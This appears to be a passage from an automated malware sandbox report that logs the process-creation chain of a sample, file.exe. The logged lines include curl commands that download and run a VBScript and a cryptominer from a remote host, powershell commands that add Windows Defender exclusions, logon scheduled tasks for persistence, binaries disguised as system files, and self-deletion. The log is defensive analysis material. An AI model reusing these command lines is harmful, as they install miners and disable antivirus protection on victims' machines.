                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.phpJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript conf.vbsJump to behavior
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
